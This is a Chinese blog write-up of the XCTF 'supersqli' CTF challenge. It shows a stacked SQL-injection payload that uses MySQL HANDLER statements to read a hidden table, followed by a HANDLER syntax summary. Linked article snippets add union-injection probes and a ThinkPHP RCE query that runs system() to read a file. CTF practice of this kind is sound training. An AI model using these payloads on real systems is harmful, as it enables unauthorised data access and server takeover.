【XCTF高手进阶区】web5_supersqli writeup(旧2.0)

最新推荐文章于 2021-07-25 17:23:01 发布
最新推荐文章于 2021-07-25 17:23:01 发布
阅读量208 收藏
点赞数
分类专栏: CTF 文章标签: SQL注入 Handler语句 字段爆破 数据库操作 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mitchell_Donovan/article/details/113666272
版权

web5_supersqli

原题链接

key:SQL堆叠注入+handler语句查询

 

①又双叒叕是那道题

我们发现问题的关键就在于如何在被禁用select等语句的情况下完成爆字段的任务

第一次我们用了执行字符串拼接后的命令

第二次我们修改了表名

这一次,来点更高端的操作——handler语句查询

 

②题目环境还是基于旧版本

提交下面的handler语句👇

 1'; handler `1919810931114514` open;handler `1919810931114514` read first;#

得到了flag👇

 

③最后补充一下handler语句用法

👉handler用法:

handler handler_table open;          打开句柄。

handler handler_table read first;    读取表中第一行数据。

handler handler_table read next;   读取表中下一条数据。

handler handler_table close;          关闭句柄。

👉更多handler的详细用法

 

 

 

Mitch311
关注
专栏目录
XCTF-WEB进阶Web_php_unserialize
Lorezon的博客
03-15 574
打开题目是一堆源码: 主要看
XCTF 逆向进阶Windows_Reverse1——WriteUp
qq_43547885的博客
02-20 1124
题目链接: Windows_Reverse1 答题过程 脱壳 首先将程序拖入 Exeinfo PE 中查看相关信息: 发现程序有upx壳, 使用upx -d将壳脱去: 脱壳显示成功, 但奇怪的是程序一运行就闪退. 先不讨论该问题, 最后再来研究. IDA PRO 分析程序 用 IDA PRO 打开该程序, 直接查看反编译代码, 发现程序逻辑非常清晰:int __cdecl main(int...
XCTF攻防世界 Web高手进阶 supersqli writeup
Senimo
04-01 1051
XCTF攻防世界 Web高手进阶 supersqli writeup supersqli 难度系数: 3.0 题目来源: 强网杯 2019 题目描述:随便注 启动靶机,打开环境: 详细writeup参考: BUUCTF [强网杯 2019] 随便注 ...
XCTF攻防世界web进阶练习_ 5_mfw
silence1_的博客
05-02 3504
XCTF攻防世界web进阶练习—mfw 题目 题目为mfw,没有任何提示。 直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化 查看它的源码,看到有一个?page=flag,flag应该在这个页面里面 但是进入这个页面发现是空的 注意到有这样一个页面,说道用到了Git方法,想到是否可能和Git源码泄露有关 于是试一下http://111.198.2...
XCTF高手进阶web5_supersqli writeup(新)
Mitchell_Donovan的博客
02-04 1143
web5_supersqli 原题链接 key:SQL堆叠注入 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样 先把默认的inject=1提交一下 提交inject=1'回显错误,猜测是单引号闭合 提交inject=1'#回显正常,说明是单引号闭合 ③一样的操作,用order by判断联合注入的字段数 提交inject=1' order by 2#,回显正常 提交inject=1
XCTF高手进阶 web5_supersqli writeup(新)
Python研究所
02-05 158
此文转载自:https://blog.csdn.net/Mitchell_Donovan/article/details/113663553#commentBox web5_supersqli 原题链接 key:报错函数+SQL堆叠注入+命令拼接 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样 先把默认的inject=...
XCTF高手进阶web5_supersqli writeup(
Mitchell_Donovan的博客
02-04 183
web5_supersqli 原题链接 key:SQL堆叠注入+表名重命名 ①题目打开后依是这个样子的???? 这题虽然还是SQL注入题,但是在版本中额外增设了一点难度 ②和上一篇wp一样,几次尝试提交后得知是单引号闭合,字段数是2 随后尝试联合查询输入 提交inject=1' union select 1,2#后返回了这玩意???? 依是这个六亲不认的正则表达式 大小写?nos!双写绕过?nos! ③还是需要堆叠注入来查询全部的数据库名???? 1';sh
XCTF高手进阶web1_baby_web writeup
weixin_50464560的博客
07-25 219
web1_baby_web 原题链接 key:php重定向   题目描述:想想初始页面是哪个 ①进入环境后页面显示只有HELLO WORLD 抬头看URL地址栏里访问的是1.php 根据题目描述,由初始页面想到index.php 尝试访问index.php,然而却又跳转到1.php   ②思路碰壁,不妨先御剑扫描一下???? 发现只有一个1.php可以访问 ...
XCTF高手进阶web3_php_rce writeup
Mitchell_Donovan的博客
01-21 411
web3_php_rce 原题链接 key:ThinkPHP5远程代码执行漏洞 ①环境打开后页面长这样式的???? ②题目是php_rce,不妨先来了解一下什么是rce???? 知识补充: 1. 什么是rce(远程代码执行漏洞) 远程命令/代码执行漏洞,简称rce漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。 2. 漏洞产生的根本原因 服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 318
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
XCTFWeb进阶部分 WriteUp(一)
野原新之助
10-24 826
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
攻防世界XCTF 高手进阶 MISCall
enj0ym4
05-20 475
下载提供的附件,发现没有后缀,用010editor打开也没发现像样的文件头 然后把它放进kali 发现后缀为bzip2,其实放进kali的时候就可以知道它是bzip的文件 可直接修改后缀,或使用命令 解压得到 查看git 记录 有一个文件被上传,但在文件中找不到,然后查看修改列表,储存列表下有一条记录 校验列表的存储文件 有一个.py文件,把它复原 最后跑一下python得到flag:NCN4dd992213ae6b76f27d7340f0dde1222888df4d3 ...
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 244
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
【CTF工具】GitHack下载安装与使用(windows下)
Mitchell_Donovan的博客
04-24 7740
下载方法 ①从github官网下载https://github.com/lijiejie/GitHack ②从codechina镜像站下载https://codechina.csdn.net/mirrors/lijiejie/githack 使用方法 下载之后解压缩,并通过cmd使用 具体操作???? ①win+R打开cmd终端,进入githack的目录下 ②使用如下代码进行下载???? python GitHack.py http://www.openssl.org(目标网址)/.g
【CTF工具】GitHack下载安装与使用(linux下)
Mitchell_Donovan的博客
04-24 5158
下载方法 ①直接通过git下载 git clone https://github.com/lijiejie/GitHack ②通过git镜像站下载 git clone https://github.com.cnpmjs.org/lijiejie/GitHack 使用方法 ①打开终端,进入到GitHacker的目录下 ②运行如下代码???? python GitHack.py http://www.openssl.org(目标网址)/.git/ 执行后会在本目录生成以网址为名字的文
【CTF工具】网址扫描器dirsearch下载安装与使用(linux下)
Mitchell_Donovan的博客
04-26 4330
dirsearch是一个python开发的目录扫描工具 和我们平时使用的dirb、御剑之类的工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口 Linux下的使用教程如下: 下载安装 打开linux终端输入以下代码???? git clone https://github.com/maurosoria/dirsearch.git 使用说明 在终端中打开dirsearch文件夹???? cd dirsearch/ 输入下列命令开始网址扫描???? ./dirsearch.
BugkuCTF web18_秋名山车神 writeup
Mitchell_Donovan的博客
01-11 2543
web18_秋名山车神 原题链接 key:python脚本 ①题目环境里的网页长这样式的???? 意思是2s内让我们算一个变态表达式,疯了吧 刷新多次,发现数字是变化的,问题更严重了...... 不过刷新过程中发现了要提交的参数value???? ②不妨写个(白嫖)python脚本吧 本题采用正则表达式,如果不熟悉这个可以先看看教程:正则教程 import requests #引入request库 import re #引入re库 url = '''http:/
XCTF高手进阶web4_Web_php_include writeup(二)
Mitchell_Donovan的博客
01-28 2108
web4_Web_php_include 原题链接 key:data://伪协议执行命令 ①打开页面还是那串代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 但是这次我们选择另一种
HashTeam web_阴间2048 writeup
Mitchell_Donovan的博客
12-29 1611
HashTeam web_阴间2048 原题链接
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值